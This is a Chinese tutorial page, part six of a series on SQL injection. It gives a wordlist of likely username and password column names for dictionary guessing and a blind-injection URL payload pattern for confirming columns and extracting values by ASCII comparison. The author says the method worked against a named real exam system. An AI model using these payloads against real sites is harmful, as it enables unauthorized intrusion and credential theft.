首页 诗词 字典 板报 句子 名言 友答 励志 学校 网站地图
当前位置: 首页 > 教程频道 > 安全技术 > 服务器安全 >

SQL注入——网络安全有关问题不容忽视!(六)

2012-08-26 
SQL注入——网络安全问题不容忽视!(六)接着上一节。这一节其实内容和上一节差不多。主要是加了字典攻击。??为什

SQL注入——网络安全问题不容忽视!(六)

接着上一节。这一节其实内容和上一节差不多。主要是加了字典攻击。

?

?

为什么这一节要提到字典攻击呢?这是有原因的。我们从系统表里面获得用户表的表名是毫无问题的。

?

因为系统表的每个列名都是可以看得到的。而我们得到一个用户表的用户名的列名个密码的列名是有难度的。因为我们不知道人家写的是什么名字。

但我们可以根据字典攻击来判断。

?

我们先来大概看一下用户名的列名大概有哪些可能

?

username
user
name
u_name
administrators
userid
adminuser
adminpass
adminname
user_name
admin_name
usr_n
usr
dw
nc
uid
admin
admin_user
admin_username
user_admin
adminusername
pwd
id
userid
bbsuser
bbsid
bbsuserid
bbsusername

?

?

我们就可以一个个去试探了。所以字典攻击充满着不肯定的因素。可能成功。也可能不会成功。

?

?

?

假设已经找到的了用户名列名是username? 和? 密码用pwd

?

?

中南党校考试系统的用户名和密码的列名就是上面这两个。我试了不到十次就成功了。

?

http://xxxxx ? id=41 and (select?count(列名)? from 已经攻下的表名)>0

?

我们只需要将列名逐次替换掉就好了。然后如果返回的页面和id=41的是一样的话。那么这个列名就是对滴。

?

?

?然后操作就和前两讲一模一样了。通过ascii值来判断每个字符是什么。然后就获得了。

?

?

?

?

额外话:

?

攻击就算是完了。这里只是一个简单的引子。接下来会讲到防御。

?

敬请期待!

?

?

?

?

?

?

?

?

?

?

热点排行